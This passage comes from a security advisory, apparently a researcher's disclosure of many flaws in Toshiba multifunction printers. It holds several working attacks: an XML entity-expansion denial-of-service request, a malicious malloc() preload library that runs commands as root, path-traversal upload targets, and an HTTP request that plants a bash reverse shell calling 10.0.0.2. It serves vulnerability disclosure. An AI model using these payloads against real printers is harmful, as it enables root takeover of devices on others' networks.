$'Referer: http://10.0.0.1:8080/?MAIN=TOPACCESS' \  
-b $'Session=10.0.0.2.852d519a6fa9825fae857bac5c003da0;  
Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DLOGS%26SUB%3DJOBLOGS%26CAT%3DPRINT' \  
--data-binary $'<!DOCTYPE lolz [\x0d\x0a <!ENTITY lol  
\"lol\">\x0d\x0a <!ELEMENT lolz (#PCDATA)>\x0d\x0a <!ENTITY lol1  
\"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\x0d\x0a  
<!ENTITY lol2 \"&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;\">\x0d\x0a  
<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\x0d\x0a  
<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">\x0d\x0a  
<!ENTITY lol5 \"&lol4;&lol4;&lol4;\">\x0d\x0a <!ENTITY lol6  
\"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">\x0d\x0a  
<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">\x0d\x0a  
<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">\x0d\x0a  
<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">\x0d\x0a]>\x0d\x0a<lolz>&lol9;</lolz>'  
\  
$'http://10.0.0.1:8080/contentwebserver' &  
[55] 2286194  
  
We can find that new Apache processes are created using `LD_PRELOAD`  
variables on the remote printer:  
  
2023/05/27 11:31:42 CMD: UID=0 PID=4132 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:42 CMD: UID=0 PID=4131 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:42 CMD: UID=0 PID=4130 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:42 CMD: UID=0 PID=4129 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4138 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4137 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4136 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4135 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4134 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4133 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4139 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:43 CMD: UID=0 PID=4140 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:44 CMD: UID=0 PID=4141 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 11:31:44 CMD: UID=0 PID=4142 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 11:31:45 CMD: UID=0 PID=4143 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:46 CMD: UID=0 PID=4145 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:46 CMD: UID=0 PID=4144 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:47 CMD: UID=0 PID=4146 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 11:31:47 CMD: UID=0 PID=4147 | watch -n 3 -t if [  
-e /root/sshd_start.sh ]; then dos2unix /root/sshd_start.sh && chmod  
+x /root/sshd_start.sh && /root/sshd_start.sh && rm  
/root/sshd_start.sh || rm /root/sshd_start.sh; fi  
2023/05/27 11:31:47 CMD: UID=0 PID=4151 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:47 CMD: UID=0 PID=4150 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:47 CMD: UID=0 PID=4149 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:47 CMD: UID=0 PID=4148 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4156 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4155 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4154 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4153 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4152 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
2023/05/27 11:31:48 CMD: UID=0 PID=4158 |  
/usr/local/ebx/bin/httpd -f /encryption/al/network/config/httpd.conf  
-k start  
  
We can analyze a newly-created Apache process. For example, the Apache  
process with the PID 4129 will have some libraries loaded in order to  
execute code implemented in these libraries:  
  
bash-4.1# cat /proc/4129/maps  
08048000-080bb000 r-xp 00000000 08:02 155908  
/home/SYSROM_SRC/build/thirdparty/bin/httpd  
080bb000-080bf000 rw-p 00072000 08:02 155908  
/home/SYSROM_SRC/build/thirdparty/bin/httpd  
080bf000-0833e000 rw-p 00000000 00:00 0 [heap]  
0833e000-08360000 rw-p 00000000 00:00 0 [heap]  
08360000-083e8000 rw-p 00000000 00:00 0 [heap]  
4bc47000-4bc63000 r-xp 00000000 08:02 11770 /lib/ld-2.11.3.so  
4bc63000-4bc64000 r--p 0001b000 08:02 11770 /lib/ld-2.11.3.so  
4bc64000-4bc65000 rw-p 0001c000 08:02 11770 /lib/ld-2.11.3.so  
4bc67000-4bda6000 r-xp 00000000 08:02 11750 /lib/libc-2.11.3.so  
4bda6000-4bda7000 ---p 0013f000 08:02 11750 /lib/libc-2.11.3.so  
4bda7000-4bda9000 r--p 0013f000 08:02 11750 /lib/libc-2.11.3.so  
4bda9000-4bdaa000 rw-p 00141000 08:02 11750 /lib/libc-2.11.3.so  
4bdaa000-4bdad000 rw-p 00000000 00:00 0  
4bdaf000-4bdb1000 r-xp 00000000 08:02 11665 /lib/libdl-2.11.3.so  
4bdb1000-4bdb2000 r--p 00001000 08:02 11665 /lib/libdl-2.11.3.so  
4bdb2000-4bdb3000 rw-p 00002000 08:02 11665 /lib/libdl-2.11.3.so  
4bdbf000-4bddf000 r-xp 00000000 08:02 139743 /usr/lib/libpcre.so.3.12.1  
4bddf000-4bde0000 rw-p 0001f000 08:02 139743 /usr/lib/libpcre.so.3.12.1  
4bdee000-4bdf0000 r-xp 00000000 08:02 144969 /usr/lib/libcom_err.so.2.1  
4bdf0000-4bdf1000 rw-p 00001000 08:02 144969 /usr/lib/libcom_err.so.2.1  
4bdfa000-4be0c000 r-xp 00000000 08:02 145525 /usr/lib/libz.so.1.2.3  
4be0c000-4be0d000 rw-p 00011000 08:02 145525 /usr/lib/libz.so.1.2.3  
4be0f000-4be12000 r-xp 00000000 08:02 144902 /usr/lib/libuuid.so.1.3.0  
4be12000-4be13000 rw-p 00002000 08:02 144902 /usr/lib/libuuid.so.1.3.0  
4be15000-4be1c000 r-xp 00000000 08:02 11732 /lib/librt-2.11.3.so  
4be1c000-4be1d000 r--p 00006000 08:02 11732 /lib/librt-2.11.3.so  
4be1d000-4be1e000 rw-p 00007000 08:02 11732 /lib/librt-2.11.3.so  
4be7e000-4be9f000 r-xp 00000000 08:02 142900 /usr/lib/libk5crypto.so.3.1  
4be9f000-4bea0000 rw-p 00021000 08:02 142900 /usr/lib/libk5crypto.so.3.1  
4bea7000-4bead000 r-xp 00000000 08:02 140031  
/usr/lib/libkrb5support.so.0.1  
4bead000-4beae000 rw-p 00005000 08:02 140031  
/usr/lib/libkrb5support.so.0.1  
4c04f000-4c133000 r-xp 00000000 08:02 145085  
/usr/lib/libstdc++.so.6.0.13  
4c133000-4c137000 r--p 000e4000 08:02 145085  
/usr/lib/libstdc++.so.6.0.13  
4c137000-4c138000 rw-p 000e8000 08:02 145085  
/usr/lib/libstdc++.so.6.0.13  
...  
710a3000-710a5000 r-xp 00000000 08:02 153564  
/home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so  
710a5000-710a6000 rw-p 00001000 08:02 153564  
/home/SYSROM_SRC/build/thirdparty/lib/mod_authn_file.so  
710a6000-710a9000 r-xp 00000000 08:02 154158  
/home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so  
710a9000-710aa000 rw-p 00002000 08:02 154158  
/home/SYSROM_SRC/build/thirdparty/lib/mod_authn_core.so  
710aa000-710b4000 r-xp 00000000 08:02 154478  
/home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so  
710b4000-710b5000 rw-p 00009000 08:02 154478  
/home/SYSROM_SRC/build/thirdparty/lib/mod_dav_fs.so  
...  
75674000-75677000 r--p 00064000 08:02 153751  
/home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0  
75677000-7567b000 rw-p 00067000 08:02 153751  
/home/SYSROM_SRC/build/thirdparty/lib/libssl.so.1.0.0  
7567b000-756b0000 r-xp 00000000 08:02 154613  
/home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6  
756b0000-756b3000 rw-p 00034000 08:02 154613  
/home/SYSROM_SRC/build/thirdparty/lib/libldap-2.4.so.2.5.6  
756b3000-756bd000 r-xp 00000000 08:02 11632 /lib/libpam.so.0.82.2  
756bd000-756be000 rw-p 0000a000 08:02 11632 /lib/libpam.so.0.82.2  
756be000-76217000 r-xp 00000000 08:02 21362  
/home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0  
76217000-76258000 rw-p 00b58000 08:02 21362  
/home/SYSROM_SRC/build/release/lib/libssdk.so.0.0.0  
76258000-7625f000 rw-p 00000000 00:00 0  
7625f000-7626a000 r-xp 00000000 08:02 20801  
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
7626a000-7626b000 rw-p 0000a000 08:02 20801  
/home/SYSROM_SRC/build/release/lib/libcimsg.so.0  
7626b000-76273000 r-xp 00000000 08:02 20878  
/home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0  
76273000-76274000 rw-p 00007000 08:02 20878  
/home/SYSROM_SRC/build/release/lib/mod_efiwebserver.so.0  
76274000-76275000 ---p 00000000 00:00 0  
76275000-76a74000 rwxp 00000000 00:00 0  
76a74000-76a77000 rw-p 00000000 00:00 0  
76a77000-76a7b000 r-xp 00000000 08:02 11633 /lib/libattr.so.1.1.0  
76a7b000-76a7c000 rw-p 00003000 08:02 11633 /lib/libattr.so.1.1.0  
76a7c000-76a82000 r-xp 00000000 08:02 11721 /lib/libacl.so.1.1.0  
76a82000-76a83000 rw-p 00005000 08:02 11721 /lib/libacl.so.1.1.0  
76a83000-76a84000 rw-p 00000000 00:00 0  
76a84000-76af3000 r-xp 00000000 08:02 21782  
/home/SYSROM_SRC/build/release/lib/libcios.so.0  
76af3000-76af7000 rw-p 0006f000 08:02 21782  
/home/SYSROM_SRC/build/release/lib/libcios.so.0  
76af7000-76b50000 r-xp 00000000 08:02 145519 /usr/lib/libintlc.so.5  
76b50000-76b53000 rw-p 00059000 08:02 145519 /usr/lib/libintlc.so.5  
76b53000-76b5c000 r-xp 00000000 08:02 11622 /lib/libcrypt-2.11.3.so  
76b5c000-76b5d000 r--p 00008000 08:02 11622 /lib/libcrypt-2.11.3.so  
76b5d000-76b5e000 rw-p 00009000 08:02 11622 /lib/libcrypt-2.11.3.so  
76b5e000-76b85000 rw-p 00000000 00:00 0  
76b85000-76b97000 r-xp 00000000 08:02 154448  
/home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0  
76b97000-76b98000 rw-p 00012000 08:02 154448  
/home/SYSROM_SRC/build/thirdparty/lib/libroken.so.18.1.0  
76b98000-76b99000 rw-p 00000000 00:00 0  
76b99000-76b9c000 r-xp 00000000 08:02 154186  
/home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3  
76b9c000-76b9d000 rw-p 00002000 08:02 154186  
/home/SYSROM_SRC/build/thirdparty/lib/libcom_err.so.1.1.3  
76b9d000-76bc4000 r-xp 00000000 08:02 154600  
/home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0  
76bc4000-76bc5000 rw-p 00027000 08:02 154600  
/home/SYSROM_SRC/build/thirdparty/lib/libwind.so.0.0.0  
76bc5000-76c64000 r-xp 00000000 08:02 154326  
/home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0  
76c64000-76c67000 rw-p 0009f000 08:02 154326  
/home/SYSROM_SRC/build/thirdparty/lib/libasn1.so.8.0.0  
76c67000-76c96000 r-xp 00000000 08:02 153499  
/home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0  
76c96000-76c99000 rw-p 0002e000 08:02 153499  
/home/SYSROM_SRC/build/thirdparty/lib/libhcrypto.so.4.1.0  
76c99000-76c9a000 rw-p 00000000 00:00 0  
76c9a000-76d0b000 r-xp 00000000 08:02 153648  
/home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0  
76d0b000-76d0d000 rw-p 00070000 08:02 153648  
/home/SYSROM_SRC/build/thirdparty/lib/libheimsqlite.so.0.0.0  
76d0d000-76d0e000 rw-p 00000000 00:00 0  
76d0e000-76d4d000 r-xp 00000000 08:02 154400  
/home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0  
76d4d000-76d4f000 rw-p 0003f000 08:02 154400  
/home/SYSROM_SRC/build/thirdparty/lib/libhx509.so.5.0.0  
76d4f000-76d55000 r-xp 00000000 08:02 145615 /usr/lib/libirng.so  
76d55000-76d58000 rw-p 00005000 08:02 145615 /usr/lib/libirng.so  
76d58000-76d6b000 r-xp 00000000 08:02 21737  
/home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0  
76d6b000-76d6c000 rw-p 00012000 08:02 21737  
/home/SYSROM_SRC/build/release/lib/libllmnrclient.so.0  
76d6c000-77568000 r-xp 00000000 08:02 157246 /mfp/lib/libsvml.so  
77568000-77586000 rw-p 007fc000 08:02 157246 /mfp/lib/libsvml.so  
77586000-77587000 rw-p 00000000 00:00 0  
77587000-775ad000 r-xp 00000000 08:02 11746 /lib/libm-2.11.3.so  
775ad000-775ae000 r--p 00025000 08:02 11746 /lib/libm-2.11.3.so  
775ae000-775af000 rw-p 00026000 08:02 11746 /lib/libm-2.11.3.so  
775af000-77624000 r-xp 00000000 08:02 145632  
/usr/lib/libsqlite3.so.0.8.6  
77624000-77626000 rw-p 00074000 08:02 145632  
/usr/lib/libsqlite3.so.0.8.6  
77626000-77627000 rw-p 00000000 00:00 0  
77627000-77695000 r-xp 00000000 08:02 154620  
/home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0  
77695000-77698000 rw-p 0006e000 08:02 154620  
/home/SYSROM_SRC/build/thirdparty/lib/libkrb5.so.25.0.0  
77698000-776ad000 r-xp 00000000 08:02 11629 /lib/libpthread-2.11.3.so  
776ad000-776ae000 r--p 00014000 08:02 11629 /lib/libpthread-2.11.3.so  
776ae000-776af000 rw-p 00015000 08:02 11629 /lib/libpthread-2.11.3.so  
776af000-776b2000 rw-p 00000000 00:00 0  
776b2000-776db000 r-xp 00000000 08:02 153455  
/home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0  
776db000-776dd000 rw-p 00028000 08:02 153455  
/home/SYSROM_SRC/build/thirdparty/lib/libapr-1.so.0.7.0  
776dd000-776fb000 r-xp 00000000 08:02 154622  
/home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1  
776fb000-776fd000 rw-p 0001e000 08:02 154622  
/home/SYSROM_SRC/build/thirdparty/lib/libaprutil-1.so.0.6.1  
776fd000-776fe000 rw-p 00000000 00:00 0  
776fe000-77702000 r-xp 00000000 08:02 154313  
/home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so  
77702000-77703000 rw-p 00003000 08:02 154313  
/home/SYSROM_SRC/build/thirdparty/lib/mod_headers.so  
77703000-77712000 r-xp 00000000 00:0d 10594  
/ramdisk/al/libGetAddtInfoInterface.so  
77712000-77714000 rw-p 0000e000 00:0d 10594  
/ramdisk/al/libGetAddtInfoInterface.so  
77714000-77715000 rw-p 00000000 00:00 0  
77715000-77720000 r-xp 00000000 00:0d 11406  
/ramdisk/al/libGetNameInfoInterface.so  
77720000-77722000 rw-p 0000a000 00:0d 11406  
/ramdisk/al/libGetNameInfoInterface.so  
  
Because of weak permissions, we can overwrite hundreds of libraries to  
get Remote Code Execution.  
  
We can overwrite the 2 libraries that will be loaded by default by the  
programs running inside the printers:  
  
- - `/ramdisk/al/libGetAddtInfoInterface.so`  
- - `/ramdisk/al/libGetNameInfoInterface.so`  
  
These 2 libraries export Intel-optimized functions.  
  
Exported functions found in the LD_PRELOAD'ed libraries:  
  
kali% nm -D  
/home/user/research/printers/topaccess/4.50-latest-version/4.50-new-version/extract/home/SYSROM_SRC/build/release/lib/libGetNameInfoInterface.so.0  
0000cf40 A __bss_start  
00009150 T __cacheSize  
w __cxa_finalize@GLIBC_2.1.3  
U dlsym@GLIBC_2.0  
0000cf40 A _edata  
0000cfc0 A _end  
00009d04 T _fini  
00002340 T getnameinfo  
00002290 T getNameInfoWrapper  
w __gmon_start__  
00002088 T _init  
00009cb0 T __intel_f2int  
00002530 T _intel_fast_memcpy  
00002440 T _intel_fast_memcpy.A  
00002500 T _intel_fast_memcpy.H  
00002470 T _intel_fast_memcpy.J  
000024a0 T _intel_fast_memcpy.M  
000024d0 T _intel_fast_memcpy.P  
000026f0 T _intel_fast_memset  
00002600 T _intel_fast_memset.A  
00002660 T _intel_fast_memset.H  
00002630 T _intel_fast_memset.J  
00002690 T _intel_fast_memset.M  
000026c0 T _intel_fast_memset.P  
000027cc T __intel_memcpy  
000033fd T __intel_memset  
000027c0 T __intel_new_memcpy  
00003b10 T __intel_new_memcpy_P3  
000033f0 T __intel_new_memset  
00004a90 T __intel_new_memset_P3  
000051e0 T __intel_sse2_memset  
00005850 T __intel_sse2_rep_memset  
00005dd0 T __intel_ssse3_memcpy  
00007dc0 T __intel_ssse3_rep_memcpy  
w _Jv_RegisterClasses  
U memcpy@GLIBC_2.0  
U memset@GLIBC_2.0  
U pthread_create@GLIBC_2.1  
U pthread_join@GLIBC_2.0  
kali% nm -D  
/home/user/research/printers/topaccess/4.50-latest-version/4.50-new-version/extract/home/SYSROM_SRC/build/release/lib/libGetNameInfoInterface.so.0  
0000cf40 A __bss_start  
00009150 T __cacheSize  
w __cxa_finalize@GLIBC_2.1.3  
U dlsym@GLIBC_2.0  
0000cf40 A _edata  
0000cfc0 A _end  
00009d04 T _fini  
00002340 T getnameinfo  
00002290 T getNameInfoWrapper  
w __gmon_start__  
00002088 T _init  
00009cb0 T __intel_f2int  
00002530 T _intel_fast_memcpy  
00002440 T _intel_fast_memcpy.A  
00002500 T _intel_fast_memcpy.H  
00002470 T _intel_fast_memcpy.J  
000024a0 T _intel_fast_memcpy.M  
000024d0 T _intel_fast_memcpy.P  
000026f0 T _intel_fast_memset  
00002600 T _intel_fast_memset.A  
00002660 T _intel_fast_memset.H  
00002630 T _intel_fast_memset.J  
00002690 T _intel_fast_memset.M  
000026c0 T _intel_fast_memset.P  
000027cc T __intel_memcpy  
000033fd T __intel_memset  
000027c0 T __intel_new_memcpy  
00003b10 T __intel_new_memcpy_P3  
000033f0 T __intel_new_memset  
00004a90 T __intel_new_memset_P3  
000051e0 T __intel_sse2_memset  
00005850 T __intel_sse2_rep_memset  
00005dd0 T __intel_ssse3_memcpy  
00007dc0 T __intel_ssse3_rep_memcpy  
w _Jv_RegisterClasses  
U memcpy@GLIBC_2.0  
U memset@GLIBC_2.0  
U pthread_create@GLIBC_2.1  
U pthread_join@GLIBC_2.0  
kali%  
  
An attacker can create a new library and export a function that will  
be used by any program, for example `malloc()`.  
  
A custom library has been written, hijacking the control flow of the  
`malloc()` function:  
  
kali% cat Makefile  
all:  
rm /home/user/research/printers/topaccess/malloc/malloc.so  
gcc -o malloc.so -m32 -shared -fPIC malloc.c  
  
kali% cat malloc.c  
#include <stdio.h>  
#include <unistd.h>  
#include <stdlib.h>  
#include <dlfcn.h>  
  
void *malloc(size_t size)  
{  
static void *(*fptr)(size_t) = NULL;  
  
if (fptr == NULL)  
{  
fptr = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc");  
if (fptr == NULL)  
{  
printf("dlsym: %s\n", dlerror());  
return NULL;  
}  
}  
  
system("LD_PRELOAD='' id > /dev/shm/id");  
  
return (*fptr)(size);  
}  
kali% make  
rm /home/user/research/printers/topaccess/malloc/malloc.so  
gcc -o malloc.so -m32 -shared -fPIC malloc.c  
kali% ls -la  
total 32  
drwx------ 2 user user 4096 May 13 11:04 .  
drwx------ 4 user user 4096 May 13 11:02 ..  
-rw------- 1 user user 112 May 13 11:04 Makefile  
-rw------- 1 user user 398 May 13 11:03 malloc.c  
-rwx------ 1 user user 14696 May 13 11:04 malloc.so  
kali%  
  
When uploading this library as  
`/ramdisk/al/libGetAddtInfoInterface.so` or  
`/ramdisk/al/libGetNameInfoInterface.so`, the `malloc()` function will  
be executed by some programs running inside the printers and the id  
command will be executed as root (the output will be written into  
`/dev/shm/id`).  
  
A side effect it that a lot of programs will also crash. The execution  
of the malicious payload will still work.  
  
By targeting only specific functions used by Apache or specific  
programs inside the printer, it is possible to avoid crashing the  
programs.  
  
  
  
### Other ways to get Remote Code Execution  
  
An attacker can use the other vulnerabilities to get Remote Code Execution:  
  
- - Local Privilege Escalation and Remote Code Execution using insecure PATH  
- - Local Privilege Escalation and Remote Code Execution using  
insecure LD_PRELOAD  
- - Local Privilege Escalation and Remote Code Execution using  
insecure LD_LIBRARY_PATH  
- - Local Privilege Escalation and Remote Code Execution using  
insecure permissions for 106 programs  
- - Local Privilege Escalation and Remote Code Execution using CISSM  
  
An attacker can remotely compromise any Toshiba printer.  
  
An attacker can overwrite any insecure files (including programs  
running as root and Python code).  
  
  
  
## Details - Multiple Post-authenticated Remote Code Executions as root  
  
Toshiba printers provide several ways to upload files using the admin  
web interface.  
  
The vulnerability in this chapter is similar to Pre-authenticated  
Remote Code Execution as root or apache and multiple Local Privilege  
Escalations but requires authentication on the TopAccess interface.  
  
When an administrator is authenticated, it is possible to upload  
documents within the web interface using the maintenance interface:  
  
- - Upload of drivers files;  
- - Upload of MAC PPD Files;  
- - Upload of Unix Filters;  
- - Upload of Driver packages;  
- - Upload of address book, mailboxes and templates;  
- - Upload of SSL certificates;  
- - ...  
  
Several webpages with an upload forms can be found in the admin interface:  
  
- - http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html  
- - http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/MacList.html  
- - http://printer-ip/Administration/maintenance/import/ImportListFrame.html  
- - http://printer-ip/Administration/Languages/InstallLanguagesUpload.html  
- - http://printer-ip/Administration/AdminRegistration/ImageIconManagementFrame.html  
- - http://printer-ip/Administration/Cloning/CloneFileUpload.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/DriverCustomize.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/MacList.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/PointAndPrintList.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/UnixList.html  
- - http://printer-ip/Administration/maintenance/uploadsoft/UploadList.html  
- - http://printer-ip/Administration/maintenance/xmlformat/XmlFormatList.html  
- - http://printer-ip/Administration/maintenance/import/ImportListFrame.html  
- - http://printer-ip/Administration/maintenance/backup/BackupList.html  
- - http://printer-ip/Administration/Security/Certificates/CertUpload.html  
- - http://printer-ip/Administration/MetaScan/XMLFormatFile/XmlFormatList.html  
- - http://printer-ip/Administration/Setup/setting/DDNSUpload.html  
- - http://printer-ip/Administration/Setup/ServerConnErrRegFileUpload.html  
- - http://printer-ip/Administration/Setup/PDLUpload.html  
- - http://printer-ip/Administration/Setup/ICCProfile/ImportICCProfile.html  
- - http://printer-ip/Administration/SystemUpdates/nSystemUpdatesUpload.html  
  
All these upload functionalities are vulnerable: they allow an  
attacker with admin privilege to overwrite any file present in the  
printers.  
  
The vulnerability likely resides in the  
`/home/SYSROM_SRC/build/release/lib/mod_contentwebserver.so.0`  
library, where the `/contentwebserver/upload` API is implemented.  
Consequently, this is a unique vulnerability that is reachable by  
using different upload forms.  
  
For example, we can see 3 different types of upload forms:  
  
Upload of Driver files  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
Upload of Unix filters  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
Upload of address book, mailboxes and templates  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
All of these forms are vulnerable by crafting a malicious `name` value  
as shown in the next screenshot. It is possible to change the HTTP  
request by modifying the name value to rewrite any file in the  
printer.  
  
For example, it is possible to overwrite the  
`/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver` shell  
script by sending a malicious file using the name value  
`/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver`:  
  
Upload of malicious ldapserver shell script:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-toshiba-mfp-40-vulnerabilities.html]  
  
It is necessary to update the cookie and the CsrfpId values:  
  
POST /contentwebserver/upload HTTP/1.1  
Host: 10.0.0.1:8081  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data;  
boundary=---------------------------136357212815291094282690264320  
Content-Length: 1056  
Origin: http://10.0.0.1:8081  
Connection: close  
Referer: http://10.0.0.1:8081/Administration/maintenance/uploadsoft/DriverCustomize.html?v=1670278837ta&fileMode=3  
Cookie: Locale=en-US,en#q=0.5; BrowserLang=en_US;  
pageTrack=MAIN%3DADMIN%26SUB%3DMAINT%26CAT%3DUPSW;  
IgnoreSessionTimeout=1;  
Session=10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3; clicked=0;  
addrLastVisited=FAVGRP  
Upgrade-Insecure-Requests: 1  
  
-----------------------------136357212815291094282690264320  
Content-Disposition: form-data; name="formSubmitCompleteEventHandler"  
  
frames[0].formSubmitCompleteUploadList  
-----------------------------136357212815291094282690264320  
Content-Disposition: form-data; name="DeviceInformationModel"  
  
<DeviceInformationModel><Command><Move><commandNode>FileStorages</commandNode><Params><source><File>script.zip</File><name>Upload</name></source><destination><name>PDPlugin</name></destination></Params></Move></Command></DeviceInformationModel>  
-----------------------------136357212815291094282690264320  
Content-Disposition: form-data; name="CsrfpId"  
  
10.0.0.2.3dfcc68624ce6c49d245e33f704a92b3  
-----------------------------136357212815291094282690264320  
Content-Disposition: form-data;  
name="/./../../../../../home/SYSROM_SRC/build/common/bin/networkservice/ldapserver";  
filename="script.zip"  
Content-Type: application/zip  
  
#!/bin/sh  
  
bash -i >& /dev/tcp/10.0.0.2/21 0>&1  
  
-----------------------------136357212815291094282690264320--  
  
Following this HTTP request, the file  
`/home/SYSROM_SRC/build/common/bin/networkservice/ldapserver` will be  
overwritten with a malicious payload.  
  
Before the execution of the HTTP request, the file is normal:  
  
